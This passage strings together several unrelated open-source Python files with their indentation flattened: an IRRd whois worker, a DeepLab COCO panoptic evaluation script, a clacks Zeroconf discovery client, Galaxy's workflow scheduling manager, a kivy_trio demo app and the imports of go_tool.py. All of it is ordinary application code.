Whois worker run loop.
This method does not return, except if it failed to initialise a preloader,
or if keep_running is False, after the first request is handled. The latter
is used in the tests.
"""
# Disable the special sigterm_handler defined in start_whois_server()
# (signal handlers are inherited)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
try:
self.preloader = Preloader()
self.database_handler = DatabaseHandler(readonly=True)
except Exception as e:
logger.critical(f'Whois worker failed to initialise preloader or database, '
f'unable to start, terminating IRRd, traceback follows: {e}',
exc_info=e)
main_pid = os.getenv(ENV_MAIN_PROCESS_PID)
if main_pid: # pragma: no cover
os.kill(int(main_pid), signal.SIGTERM)
else:
logger.error('Failed to terminate IRRd, unable to find main process PID')
return
while True:
try:
setproctitle('irrd-whois-worker')
self.request, self.client_address = self.connection_queue.get()
self.setup()
self.handle_connection()
self.finish()
self.close_request()
memory_trim()
except Exception as e:
try:
self.close_request()
except Exception: # pragma: no cover
pass
logger.error(f'Failed to handle whois connection, traceback follows: {e}',
exc_info=e)
if not keep_running:
break
def close_request(self):
# Close the connection in a similar way normally done by TCPServer
try:
# Try to set the timeout of the shutdown call (#607)
self.request.settimeout(5)
except OSError: # pragma: no cover
pass
try:
# explicitly shutdown. socket.close() merely releases
# the socket and waits for GC to perform the actual close.
self.request.shutdown(socket.SHUT_RDWR)
except OSError: # pragma: no cover
pass # some platforms may raise ENOTCONN here
self.request.close()
def handle_connection(self):
"""
Handle an individual whois client connection.
When this method returns, the connection is closed.
"""
client_ip = self.client_address[0]
self.client_str = client_ip + ':' + str(self.client_address[1])
setproctitle(f'irrd-whois-worker-{self.client_str}')
if not self.is_client_permitted(client_ip):
self.wfile.write(b'%% Access denied')
return
self.query_parser = WhoisQueryParser(client_ip, self.client_str, self.preloader,
self.database_handler)
data = True
while data:
timer = threading.Timer(self.query_parser.timeout, self.close_request)
timer.start()
data = self.rfile.readline()
timer.cancel()
query = data.decode('utf-8', errors='backslashreplace').strip()
if not query:
continue
logger.debug(f'{self.client_str}: processing query: {query}')
if not self.handle_query(query):
return
def handle_query(self, query: str) -> bool:
"""
Handle an individual query.
Returns False when the connection should be closed,
True when more queries should be read.
"""
start_time = time.perf_counter()
if query.upper() == '!Q':
logger.debug(f'{self.client_str}: closed connection per request')
return False
response = self.query_parser.handle_query(query)
response_bytes = response.generate_response().encode('utf-8')
try:
self.wfile.write(response_bytes)
except OSError:
return False
elapsed = time.perf_counter() - start_time
logger.info(f'{self.client_str}: sent answer to query, elapsed {elapsed:.9f}s, '
f'{len(response_bytes)} bytes: {query}')
if not self.query_parser.multiple_command_mode:
logger.debug(f'{self.client_str}: auto-closed connection')
return False
return True
def is_client_permitted(self, ip: str) -> bool:
"""
Check whether a client is permitted.
"""
return is_client_permitted(ip, 'server.whois.access_list', default_deny=False)
|
eval_coco_format.py
|
# Copyright 2019 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Computes evaluation metrics on groundtruth and predictions in COCO format.
The Common Objects in Context (COCO) dataset defines a format for specifying
combined semantic and instance segmentations as "panoptic" segmentations. This
is done with the combination of JSON and image files as specified at:
http://cocodataset.org/#format-results
where the JSON file specifies the overall structure of the result,
including the categories for each annotation, and the images specify the image
region for each annotation in that image by its ID.
This script computes additional metrics such as Parsing Covering on datasets and
predictions in this format. An implementation of Panoptic Quality is also
provided for convenience.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import multiprocessing
import os
import collections
import numpy as np
import six
import utils as panopticapi_utils
from PIL import Image
from absl import app
from absl import flags
from absl import logging
from deeplab.evaluation import panoptic_quality
from deeplab.evaluation import parsing_covering
FLAGS = flags.FLAGS
flags.DEFINE_string(
'gt_json_file', None,
' Path to a JSON file giving ground-truth annotations in COCO format.')
flags.DEFINE_string('pred_json_file', None,
'Path to a JSON file for the predictions to evaluate.')
flags.DEFINE_string(
'gt_folder', None,
'Folder containing panoptic-format ID images to match ground-truth '
'annotations to image regions.')
flags.DEFINE_string('pred_folder', None,
'Folder containing ID images for predictions.')
flags.DEFINE_enum(
'metric', 'pq', ['pq', 'pc'], 'Shorthand name of a metric to compute. '
'Supported values are:\n'
'Panoptic Quality (pq)\n'
'Parsing Covering (pc)')
flags.DEFINE_integer(
'num_categories', 201,
'The number of segmentation categories (or "classes") in the dataset.')
flags.DEFINE_integer(
'ignored_label', 0,
'A category id that is ignored in evaluation, e.g. the void label as '
'defined in COCO panoptic segmentation dataset.')
flags.DEFINE_integer(
'max_instances_per_category', 256,
'The maximum number of instances for each category. Used in ensuring '
'unique instance labels.')
flags.DEFINE_integer('intersection_offset', None,
'The maximum number of unique labels.')
flags.DEFINE_bool(
'normalize_by_image_size', True,
'Whether to normalize groundtruth instance region areas by image size. If '
'True, groundtruth instance areas and weighted IoUs will be divided by the '
'size of the corresponding image before accumulated across the dataset. '
'Only used for Parsing Covering (pc) evaluation.')
flags.DEFINE_integer(
'num_workers', 0, 'If set to a positive number, will spawn child processes '
'to compute parts of the metric in parallel by splitting '
'the images between the workers. If set to -1, will use '
'the value of multiprocessing.cpu_count().')
flags.DEFINE_integer('print_digits', 3,
'Number of significant digits to print in metrics.')
def _build_metric(metric,
num_categories,
ignored_label,
max_instances_per_category,
intersection_offset=None,
normalize_by_image_size=True):
"""Creates a metric aggregator objet of the given name."""
if metric == 'pq':
logging.warning('One should check Panoptic Quality results against the '
'official COCO API code. Small numerical differences '
'(< 0.1%) can be magnified by rounding.')
return panoptic_quality.PanopticQuality(num_categories, ignored_label,
max_instances_per_category,
intersection_offset)
elif metric == 'pc':
return parsing_covering.ParsingCovering(
num_categories, ignored_label, max_instances_per_category,
intersection_offset, normalize_by_image_size)
else:
raise ValueError('No implementation for metric "%s"' % metric)
def _matched_annotations(gt_json, pred_json):
"""Yields a set of (groundtruth, prediction) image annotation pairs.."""
image_id_to_pred_ann = {
annotation['image_id']: annotation
for annotation in pred_json['annotations']
}
for gt_ann in gt_json['annotations']:
image_id = gt_ann['image_id']
pred_ann = image_id_to_pred_ann[image_id]
yield gt_ann, pred_ann
def _open_panoptic_id_image(image_path):
"""Loads a COCO-format panoptic ID image from file."""
return panopticapi_utils.rgb2id(
np.array(Image.open(image_path), dtype=np.uint32))
def _split_panoptic(ann_json, id_array, ignored_label, allow_crowds):
"""Given the COCO JSON and ID map, splits into categories and instances."""
category = np.zeros(id_array.shape, np.uint16)
instance = np.zeros(id_array.shape, np.uint16)
next_instance_id = collections.defaultdict(int)
# Skip instance label 0 for ignored label. That is reserved for void.
next_instance_id[ignored_label] = 1
for segment_info in ann_json['segments_info']:
if allow_crowds and segment_info['iscrowd']:
category_id = ignored_label
else:
category_id = segment_info['category_id']
mask = np.equal(id_array, segment_info['id'])
category[mask] = category_id
instance[mask] = next_instance_id[category_id]
next_instance_id[category_id] += 1
return category, instance
def _category_and_instance_from_annotation(ann_json, folder, ignored_label,
allow_crowds):
"""Given the COCO JSON annotations, finds maps of categories and instances."""
panoptic_id_image = _open_panoptic_id_image(
os.path.join(folder, ann_json['file_name']))
return _split_panoptic(ann_json, panoptic_id_image, ignored_label,
allow_crowds)
def _compute_metric(metric_aggregator, gt_folder, pred_folder,
annotation_pairs):
"""Iterates over matched annotation pairs and computes a metric over them."""
for gt_ann, pred_ann in annotation_pairs:
# We only expect "iscrowd" to appear in the ground-truth, and not in model
# output. In predicted JSON it is simply ignored, as done in official code.
gt_category, gt_instance = _category_and_instance_from_annotation(
gt_ann, gt_folder, metric_aggregator.ignored_label, True)
pred_category, pred_instance = _category_and_instance_from_annotation(
pred_ann, pred_folder, metric_aggregator.ignored_label, False)
metric_aggregator.compare_and_accumulate(gt_category, gt_instance,
pred_category, pred_instance)
return metric_aggregator
def _iterate_work_queue(work_queue):
"""Creates an iterable that retrieves items from a queue until one is None."""
task = work_queue.get(block=True)
while task is not None:
yield task
task = work_queue.get(block=True)
def _run_metrics_worker(metric_aggregator, gt_folder, pred_folder, work_queue,
result_queue):
result = _compute_metric(metric_aggregator, gt_folder, pred_folder,
_iterate_work_queue(work_queue))
result_queue.put(result, block=True)
def _is_thing_array(categories_json, ignored_label):
"""is_thing[category_id] is a bool on if category is "thing" or "stuff"."""
is_thing_dict = {}
for category_json in categories_json:
is_thing_dict[category_json['id']] = bool(category_json['isthing'])
# Check our assumption that the category ids are consecutive.
# Usually metrics should be able to handle this case, but adding a warning
# here.
max_category_id = max(six.iterkeys(is_thing_dict))
if len(is_thing_dict) != max_category_id + 1:
seen_ids = six.viewkeys(is_thing_dict)
all_ids = set(six.moves.range(max_category_id + 1))
unseen_ids = all_ids.difference(seen_ids)
if unseen_ids != {ignored_label}:
logging.warning(
'Nonconsecutive category ids or no category JSON specified for ids: '
'%s', unseen_ids)
is_thing_array = np.zeros(max_category_id + 1)
for category_id, is_thing in six.iteritems(is_thing_dict):
is_thing_array[category_id] = is_thing
return is_thing_array
def eval_coco_format(gt_json_file,
pred_json_file,
gt_folder=None,
pred_folder=None,
metric='pq',
num_categories=201,
ignored_label=0,
max_instances_per_category=256,
intersection_offset=None,
normalize_by_image_size=True,
num_workers=0,
print_digits=3):
"""Top-level code to compute metrics on a COCO-format result.
Note that the default values are set for COCO panoptic segmentation dataset,
and thus the users may want to change it for their own dataset evaluation.
Args:
gt_json_file: Path to a JSON file giving ground-truth annotations in COCO
format.
pred_json_file: Path to a JSON file for the predictions to evaluate.
gt_folder: Folder containing panoptic-format ID images to match ground-truth
annotations to image regions.
pred_folder: Folder containing ID images for predictions.
metric: Name of a metric to compute.
num_categories: The number of segmentation categories (or "classes") in the
dataset.
ignored_label: A category id that is ignored in evaluation, e.g. the "void"
label as defined in the COCO panoptic segmentation dataset.
max_instances_per_category: The maximum number of instances for each
category. Used in ensuring unique instance labels.
intersection_offset: The maximum number of unique labels.
normalize_by_image_size: Whether to normalize groundtruth instance region
areas by image size. If True, groundtruth instance areas and weighted IoUs
will be divided by the size of the corresponding image before accumulated
across the dataset. Only used for Parsing Covering (pc) evaluation.
num_workers: If set to a positive number, will spawn child processes to
compute parts of the metric in parallel by splitting the images between
the workers. If set to -1, will use the value of
multiprocessing.cpu_count().
print_digits: Number of significant digits to print in summary of computed
metrics.
Returns:
The computed result of the metric as a float scalar.
"""
with open(gt_json_file, 'r') as gt_json_fo:
gt_json = json.load(gt_json_fo)
with open(pred_json_file, 'r') as pred_json_fo:
pred_json = json.load(pred_json_fo)
if gt_folder is None:
gt_folder = gt_json_file.replace('.json', '')
if pred_folder is None:
pred_folder = pred_json_file.replace('.json', '')
if intersection_offset is None:
intersection_offset = (num_categories + 1) * max_instances_per_category
metric_aggregator = _build_metric(
metric, num_categories, ignored_label, max_instances_per_category,
intersection_offset, normalize_by_image_size)
if num_workers == -1:
logging.info('Attempting to get the CPU count to set # workers.')
num_workers = multiprocessing.cpu_count()
if num_workers > 0:
logging.info('Computing metric in parallel with %d workers.', num_workers)
work_queue = multiprocessing.Queue()
result_queue = multiprocessing.Queue()
workers = []
worker_args = (metric_aggregator, gt_folder, pred_folder, work_queue,
result_queue)
for _ in six.moves.range(num_workers):
workers.append(
multiprocessing.Process(target=_run_metrics_worker, args=worker_args))
for worker in workers:
worker.start()
for ann_pair in _matched_annotations(gt_json, pred_json):
work_queue.put(ann_pair, block=True)
# Will cause each worker to return a result and terminate upon recieving a
# None task.
for _ in six.moves.range(num_workers):
work_queue.put(None, block=True)
# Retrieve results.
for _ in six.moves.range(num_workers):
metric_aggregator.merge(result_queue.get(block=True))
for worker in workers:
worker.join()
else:
logging.info('Computing metric in a single process.')
annotation_pairs = _matched_annotations(gt_json, pred_json)
_compute_metric(metric_aggregator, gt_folder, pred_folder, annotation_pairs)
is_thing = _is_thing_array(gt_json['categories'], ignored_label)
metric_aggregator.print_detailed_results(
is_thing=is_thing, print_digits=print_digits)
return metric_aggregator.detailed_results(is_thing=is_thing)
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
eval_coco_format(FLAGS.gt_json_file, FLAGS.pred_json_file, FLAGS.gt_folder,
FLAGS.pred_folder, FLAGS.metric, FLAGS.num_categories,
FLAGS.ignored_label, FLAGS.max_instances_per_category,
FLAGS.intersection_offset, FLAGS.normalize_by_image_size,
FLAGS.num_workers, FLAGS.print_digits)
if __name__ == '__main__':
flags.mark_flags_as_required(
['gt_json_file', 'gt_folder', 'pred_json_file', 'pred_folder'])
app.run(main)
|
zeroconf_client.py
|
# This file is part of the clacks framework.
#
# http://clacks-project.org
#
# Copyright:
# (C) 2010-2012 GONICUS GmbH, Germany, http://www.gonicus.de
#
# License:
# GPL-2: http://www.gnu.org/licenses/gpl-2.0.html
#
# See the LICENSE file in the project's top-level directory for details.
import re
import select
import platform
import shlex
import subprocess
from threading import Thread
from Queue import Queue
if platform.system() != "Windows":
from clacks.common.components.dbus_runner import DBusRunner
import dbus
import avahi
else:
import pybonjour #@UnresolvedImport
class ZeroconfException(Exception):
pass
class ZeroconfClient(object):
"""
The ZeroconfClient class helps with browsing for announced services. It
creates a separate thread and needs the registrated service to look for
as a parameter.
Usage example::
>>> import time
>>> import ZerconfClient
>>>
>>> # This is the function called on changes
>>> def callback(sdRef, flags, interfaceIndex, errorCode, fullname,
... hosttarget, port, txtRecord):
... print('Resolved service:')
... print(' fullname =', fullname)
... print(' hosttarget =', hosttarget)
... print(' TXT =', txtRecord)
... print(' port =', port)
>>>
>>> # Get instance and tell client to start
>>> z= ZeroconfClient(['_amqps._tcp'], callback=callback)
>>> z.start()
>>>
>>> # Do some sleep until someone presses Ctrl+C
>>> try:
>>> while True:
>>> time.sleep(1)
>>> except KeyboardInterrupt:
>>> # Shutdown client
>>> z.stop()
>>> exit()
=============== ============
Parameter Description
=============== ============
regtypes The service list to watch out for - i.e. _amqps._tcp
timeout The timeout in seconds
callback Method to call when we've received something
domain optional DNS domain to discover
direct Do not use python DBUS, but the avahi-browse binary
=============== ============
"""
__resolved = []
__services = {}
oneshot = False
def __init__(self, regtypes, timeout=2.0, callback=None, domain='local',
direct=False):
self.__timeout = timeout
self.__callback = callback
self.__regtypes = regtypes
self.__domain = domain
self.__server = None
self.__thread = None
self.__runner = None
self.active = False
if platform.system() != "Windows":
if direct:
self.start = self.startDirect
self.stop = self.stopDirect
else:
self.start = self.startAvahi
self.stop = self.stopAvahi
else:
self.start = self.startPybonjour
self.stop = self.stopPybonjour
def __get_path(self, txt):
l = avahi.txt_array_to_string_array(txt)
for k in l:
if k[:5] == "path=":
if k[5:].startswith("/"):
return k[5:]
else:
return "/" + k[5:]
return "/"
def __get_service(self, txt):
l = avahi.txt_array_to_string_array(txt)
for k in l:
if k[:8] == "service=":
return k[8:]
return None
@staticmethod
def discover(regs, domain=None, direct=False):
q = Queue()
def done_callback(services):
q.put(services)
mdns = ZeroconfClient(regs, callback=done_callback, direct=direct)
mdns.start()
if domain:
sddns = ZeroconfClient(regs, callback=done_callback, domain=domain,
direct=direct)
sddns.start()
while True:
urls = q.get()
q.task_done()
if urls:
break
if domain:
sddns.stop()
mdns.stop()
return urls
def startDirect(self):
self.active = True
def runner():
services = None
while self.active:
# Find local services
services = self.__direct_start("avahi-browse -atkpr")
# If there are none, check global services
if not services:
services = self.__direct_start("avahi-browse -atkpr -d %s" % self.domain)
self.__callback([] if not services else services)
self.__thread = Thread(target=runner)
self.__thread.start()
def __direct_start(self, cmd):
service = []
args = shlex.split(cmd)
output, error = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
if error:
return []
for line in output.split('\n'):
if line.startswith("="):
flag, device, wproto, dsc, proto, loc, address, ip, port, txt = line.split(";") #@UnusedVariable
txt = re.findall(r'"([^"]+)"', txt)
if txt:
info = dict([v.split("=")[0:2] for v in txt])
if 'service' in info and info['service'] == 'clacks':
service.append("%s://%s:%s%s" % (proto.split(".")[0][1:], address, port, info['path'] if info['path'].startswith("/") else "/" + info["path"]))
return list(set(service))
def stopDirect(self):
self.active = False
self.__thread.join()
def startAvahi(self):
self.__runner = DBusRunner.get_instance()
bus = self.__runner.get_system_bus()
bus.add_signal_receiver(self.__dbus_connect, "NameOwnerChanged", "org.freedesktop.DBus", arg0="org.freedesktop.Avahi")
self.__avahi_start()
def __avahi_start(self):
bus = self.__runner.get_system_bus()
self.__server = dbus.Interface(
bus.get_object(avahi.DBUS_NAME, avahi.DBUS_PATH_SERVER),
avahi.DBUS_INTERFACE_SERVER)
# Register for all types we're interested in
for reg_type in self.__regtypes:
self.__registerServiceTypeAvahi(reg_type)
self.__runner.start()
def stopAvahi(self):
self.__runner.stop()
def __dbus_connect(self, a, connect, disconnect):
if connect != "":
self.stopAvahi()
else:
self.__avahi_start()
def __registerServiceTypeAvahi(self, reg_type):
bus = self.__runner.get_system_bus()
sbrowser = dbus.Interface(
bus.get_object(
avahi.DBUS_NAME,
self.__server.ServiceBrowserNew(
avahi.IF_UNSPEC,
avahi.PROTO_INET,
reg_type,
self.__domain,
dbus.UInt32(0))),
avahi.DBUS_INTERFACE_SERVICE_BROWSER)
sbrowser.connect_to_signal("ItemNew", self.__newServiceAvahi)
sbrowser.connect_to_signal("ItemRemove", self.__removeServiceAvahi)
#sbrowser.connect_to_signal("AllForNow", self.__allForNowAvahi)
#sbrowser.connect_to_signal("Failure", self.__errorCallbackAvahi)
#pylint: disable=W0613
def __newServiceAvahi(self, interface, protocol, name, stype, domain, flags):
#pylint: disable=W0612
self.__server.ResolveService(interface, protocol, name, stype, domain, avahi.PROTO_INET, dbus.UInt32(0), reply_handler=self.__service_resolved, error_handler=self.__print_error)
def __print_error(self, err):
try:
from clacks.common import Environment
env = Environment.getInstance()
env.log.error(err)
except:
pass
def __service_resolved(self, interface, protocol, name, stype, domain, host, aprotocol, address, port, txt, flags):
# Conversation to URL
if port == 80:
port = ''
else:
port = ':%i' % port
if self.__get_service(txt) == "clacks":
path = self.__get_path(txt)
url = "%s://%s%s%s" % (stype[1:].split(".")[0], host, port, path)
self.__services[(interface, protocol, name, stype, domain)] = url.encode('ascii')
self.__callback(self.__services.values())
def __removeServiceAvahi(self, interface, protocol, name, stype, domain):
del self.__services[(interface, protocol, name, stype, domain)]
def __allForNowAvahi(self):
self.__callback(self.__services.values())
def __errorCallbackAvahi(self, *args):
raise ZeroconfException("DBUS communication error: %s" % str(args[0]))
def startPybonjour(self):
self.active = True
browse_sdRefs = []
# Start the bonjour event processing.
for reg_type in self.__regtypes: #@UnusedVariable
browse_sdRefs.append(pybonjour.DNSServiceBrowse(regtype=self.__regtypes,
callBack=self.__browseCallback))
def runner():
try:
browse_sdRef = None
while self.active:
ready = select.select(browse_sdRefs, [], [],
self.__timeout)
for browse_sdRef in browse_sdRefs:
if browse_sdRef in ready[0]:
pybonjour.DNSServiceProcessResult(browse_sdRef)
finally:
if browse_sdRef:
browse_sdRef.close()
self.__thread = Thread(target=runner)
self.__thread.start()
def stopPybonjour(self):
self.active = False
self.__thread.join()
def __resolveCallback(self, sdRef, flags, interfaceIndex, errorCode,
fullname, host, port, txt):
if errorCode == pybonjour.kDNSServiceErr_NoError:
# Conversation to URL
if port == 80:
port = ''
else:
port = ':%i' % port
if self.__get_service(txt) == "clacks":
path = self.__get_path(txt)
url = "%s://%s%s%s" % (fullname.split(".")[-4:-3][0][1:], host, port, path)
self.__callback([url.encode('ascii')])
self.__resolved.append(True)
def __browseCallback(self, sdRef, flags, interfaceIndex, errorCode,
serviceName, regtype, replyDomain):
if errorCode != pybonjour.kDNSServiceErr_NoError:
return
# Service removed
if not (flags & pybonjour.kDNSServiceFlagsAdd):
return
# Service added
resolve_sdRef = pybonjour.DNSServiceResolve(0,
interfaceIndex,
serviceName,
regtype,
replyDomain,
self.__resolveCallback)
try:
while not self.__resolved:
ready = select.select([resolve_sdRef], [], [], self.__timeout)
if resolve_sdRef not in ready[0]:
pass
pybonjour.DNSServiceProcessResult(resolve_sdRef)
else:
self.__resolved.pop()
finally:
resolve_sdRef.close()
|
scheduling_manager.py
|
import os
import time
import logging
import threading
from xml.etree import ElementTree
from galaxy import model
from galaxy.util import plugin_config
import galaxy.workflow.schedulers
log = logging.getLogger( __name__ )
DEFAULT_SCHEDULER_ID = "default" # well actually this should be called DEFAULT_DEFAULT_SCHEDULER_ID...
DEFAULT_SCHEDULER_PLUGIN_TYPE = "core"
EXCEPTION_MESSAGE_SHUTDOWN = "Exception raised while attempting to shutdown workflow scheduler."
EXCEPTION_MESSAGE_NO_SCHEDULERS = "Failed to defined workflow schedulers - no workflow schedulers defined."
EXCEPTION_MESSAGE_NO_DEFAULT_SCHEDULER = "Failed to defined workflow schedulers - no workflow scheduler found for default id '%s'."
EXCEPTION_MESSAGE_DUPLICATE_SCHEDULERS = "Failed to defined workflow schedulers - workflow scheduling plugin id '%s' duplicated."
class WorkflowSchedulingManager( object ):
""" A workflow scheduling manager based loosely on pattern established by
``galaxy.manager.JobManager``. Only schedules workflows on handler
processes.
"""
def __init__( self, app ):
self.app = app
self.__job_config = app.job_config
self.workflow_schedulers = {}
self.active_workflow_schedulers = {}
# Passive workflow schedulers won't need to be monitored I guess.
self.request_monitor = None
self.__plugin_classes = self.__plugins_dict()
self.__init_schedulers()
if self._is_workflow_handler():
log.debug("Starting workflow schedulers")
self.__start_schedulers()
if self.active_workflow_schedulers:
self.__start_request_monitor()
else:
# Process should not schedule workflows - do nothing.
pass
# Provide a handler config-like interface by delegating to job handler
# config. Perhaps it makes sense to let there be explicit workflow
# handlers?
def _is_workflow_handler( self ):
return self.app.is_job_handler()
def _get_handler( self ):
return self.__job_config.get_handler( None )
def shutdown( self ):
for workflow_scheduler in self.workflow_schedulers.itervalues():
try:
workflow_scheduler.shutdown()
except Exception:
log.exception( EXCEPTION_MESSAGE_SHUTDOWN )
if self.request_monitor:
try:
self.request_monitor.shutdown()
except Exception:
log.exception( "Failed to shutdown workflow request monitor." )
def queue( self, workflow_invocation, request_params ):
workflow_invocation.state = model.WorkflowInvocation.states.NEW
scheduler = request_params.get( "scheduler", None ) or self.default_scheduler_id
handler = self._get_handler()
log.info("Queueing workflow invocation for handler [%s]" % handler)
workflow_invocation.scheduler = scheduler
workflow_invocation.handler = handler
sa_session = self.app.model.context
sa_session.add( workflow_invocation )
sa_session.flush()
return workflow_invocation
def __start_schedulers( self ):
for workflow_scheduler in self.workflow_schedulers.itervalues():
workflow_scheduler.startup( self.app )
def __plugins_dict( self ):
return plugin_config.plugins_dict( galaxy.workflow.schedulers, 'plugin_type' )
def __init_schedulers( self ):
config_file = self.app.config.workflow_schedulers_config_file
use_default_scheduler = False
if not config_file:
log.info( "Not workflow schedulers plugin config file defined, using default scheduler." )
use_default_scheduler = True
elif not os.path.exists( config_file ):
log.info( "Cannot find workflow schedulers plugin config file '%s', using default scheduler." % config_file )
use_default_scheduler = True
if use_default_scheduler:
self.__init_default_scheduler()
else:
plugins_element = ElementTree.parse( config_file ).getroot()
self.__init_schedulers_for_element( plugins_element )
def __init_default_scheduler( self ):
self.default_scheduler_id = DEFAULT_SCHEDULER_ID
self.__init_plugin( DEFAULT_SCHEDULER_PLUGIN_TYPE )
def __init_schedulers_for_element( self, plugins_element ):
plugins_kwds = dict( plugins_element.items() )
self.default_scheduler_id = plugins_kwds.get( 'default', DEFAULT_SCHEDULER_ID )
for plugin_element in plugins_element:
plugin_type = plugin_element.tag
plugin_kwds = dict( plugin_element.items() )
workflow_scheduler_id = plugin_kwds.get( 'id', None )
self.__init_plugin( plugin_type, workflow_scheduler_id, **plugin_kwds )
if not self.workflow_schedulers:
raise Exception( EXCEPTION_MESSAGE_NO_SCHEDULERS )
if self.default_scheduler_id not in self.workflow_schedulers:
raise Exception( EXCEPTION_MESSAGE_NO_DEFAULT_SCHEDULER % self.default_scheduler_id )
def __init_plugin( self, plugin_type, workflow_scheduler_id=None, **kwds ):
workflow_scheduler_id = workflow_scheduler_id or self.default_scheduler_id
if workflow_scheduler_id in self.workflow_schedulers:
raise Exception( EXCEPTION_MESSAGE_DUPLICATE_SCHEDULERS % workflow_scheduler_id )
workflow_scheduler = self.__plugin_classes[ plugin_type ]( **kwds )
self.workflow_schedulers[ workflow_scheduler_id ] = workflow_scheduler
if isinstance( workflow_scheduler, galaxy.workflow.schedulers.ActiveWorkflowSchedulingPlugin ):
self.active_workflow_schedulers[ workflow_scheduler_id ] = workflow_scheduler
def __start_request_monitor( self ):
self.request_monitor = WorkflowRequestMonitor( self.app, self )
class WorkflowRequestMonitor( object ):
def __init__( self, app, workflow_scheduling_manager ):
self.app = app
self.active = True
self.workflow_scheduling_manager = workflow_scheduling_manager
self.monitor_thread = threading.Thread( name="WorkflowRequestMonitor.monitor_thread", target=self.__monitor )
self.monitor_thread.setDaemon( True )
self.monitor_thread.start()
def __monitor( self ):
to_monitor = self.workflow_scheduling_manager.active_workflow_schedulers
while self.active:
for workflow_scheduler_id, workflow_scheduler in to_monitor.iteritems():
if not self.active:
return
self.__schedule( workflow_scheduler_id, workflow_scheduler )
# TODO: wake if stopped
time.sleep(1)
def __schedule( self, workflow_scheduler_id, workflow_scheduler ):
invocation_ids = self.__active_invocation_ids( workflow_scheduler_id )
for invocation_id in invocation_ids:
self.__attempt_schedule( invocation_id, workflow_scheduler )
if not self.active:
return
def __attempt_schedule( self, invocation_id, workflow_scheduler ):
sa_session = self.app.model.context
workflow_invocation = sa_session.query( model.WorkflowInvocation ).get( invocation_id )
if not workflow_invocation or not workflow_invocation.active:
return False
try:
# This ensures we're only ever working on the 'first' active
# workflow invocation in a given history, to force sequential
# activation.
if self.app.config.history_local_serial_workflow_scheduling:
for i in workflow_invocation.history.workflow_invocations:
if i.active and i.id < workflow_invocation.id:
return False
workflow_scheduler.schedule( workflow_invocation )
except Exception:
# TODO: eventually fail this - or fail it right away?
log.exception( "Exception raised while attempting to schedule workflow request." )
return False
# A workflow was obtained and scheduled...
return True
def __active_invocation_ids( self, scheduler_id ):
sa_session = self.app.model.context
handler = self.app.config.server_name
return model.WorkflowInvocation.poll_active_workflow_ids(
sa_session,
scheduler=scheduler_id,
handler=handler,
)
def shutdown( self ):
self.active = False
|
combo_test_example.py
|
import trio
import time
from threading import Thread
from kivy.app import App
from kivy.lang import Builder
from kivy.clock import Clock
from kivy.properties import NumericProperty, StringProperty, BooleanProperty
from kivy_trio.to_kivy import async_run_in_kivy, EventLoopStoppedError, \
AsyncKivyBind
from kivy_trio.to_trio import kivy_run_in_async, mark, KivyEventCancelled
from kivy_trio.context import kivy_trio_context_manager, \
trio_context_manager, initialize_kivy_from_trio
kv = '''
BoxLayout:
spacing: '5dp'
orientation: 'vertical'
BoxLayout:
spacing: '5dp'
Button:
on_release: app.wait_async(float(delay.text or 0))
text: 'Press to wait'
TextInput:
id: delay
text: '1.5'
input_filter: 'float'
hint_text: 'delay'
Label:
text: 'measured delay: {}\\n{}'.format(app.delay, app.delay_msg)
BoxLayout:
spacing: '5dp'
Button:
on_release: app.trigger_async_error()
text: 'Trigger error:'
Label:
text: 'Error message: {}'.format(app.error_msg)
Label:
text: 'trio sent: {}'.format(app.trio_msg)
BoxLayout:
spacing: '5dp'
Button:
on_kv_post: app.press_btn = self
id: press_btn
text: 'Press me'
Label:
text: 'Trio says: button is {}'.format(app.pressing_button)
'''
class DemoApp(App):
delay = NumericProperty(0)
delay_msg = StringProperty('')
error_msg = StringProperty('')
trio_msg = StringProperty('')
pressing_button = BooleanProperty(False)
press_btn = None
count = 0
def build(self):
return Builder.load_string(kv)
async def sleep_for(self, delay):
await trio.sleep(delay)
self.count += 1
return f'Thanks for nap {self.count}!!'
@kivy_run_in_async
def wait_async(self, delay):
self.delay = 0
self.delay_msg = ''
ts = time.perf_counter()
try:
self.delay_msg = yield mark(self.sleep_for, delay)
except KivyEventCancelled:
print('cancelled wait_async while it was waiting')
return
self.delay = time.perf_counter() - ts
async def raise_error(self):
await trio.sleep(2)
raise ValueError('Who has woken me at this hour???')
@kivy_run_in_async
def trigger_async_error(self):
self.error_msg = ''
try:
yield mark(self.raise_error)
except ValueError as e:
self.error_msg = str(e)
except KivyEventCancelled:
print('cancelled trigger_async_error while it was waiting')
@async_run_in_kivy
def send_kivy_message(self, packet):
self.trio_msg = f'beetle juice {packet} times'
async def send_msg_to_kivy_from_trio(self):
i = 0
while True:
try:
await self.send_kivy_message(i)
except EventLoopStoppedError:
# kivy stopped so nothing more to do
return
i += 1
await trio.sleep(1.3)
@async_run_in_kivy
def set_button_state(self, state):
self.pressing_button = state
async def track_press_button(self):
while self.press_btn is None:
# wait for app to be set up
await trio.sleep(.1)
async with AsyncKivyBind(obj=self.press_btn, name='state') as queue:
async for value in queue:
await self.set_button_state(value[1])
def _trio_thread_target(self):
async def runner():
with trio_context_manager():
await initialize_kivy_from_trio()
async with trio.open_nursery() as nursery:
nursery.start_soon(self.send_msg_to_kivy_from_trio)
nursery.start_soon(self.track_press_button)
trio.run(runner)
def run_threading(self):
thread = Thread(target=self._trio_thread_target)
# start the trio thread once kivy's widgets are set up and ready
Clock.schedule_once(lambda x: thread.start())
self.run()
# wait until trio thread is done
thread.join()
async def run_app(self):
with kivy_trio_context_manager():
async with trio.open_nursery() as nursery:
nursery.start_soon(self.async_run, 'trio')
nursery.start_soon(self.send_msg_to_kivy_from_trio)
nursery.start_soon(self.track_press_button)
if __name__ == '__main__':
trio.run(DemoApp().run_app)
# DemoApp().run_threading()
|
go_tool.py
|
from __future__ import absolute_import
import argparse
import copy
import json
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import six
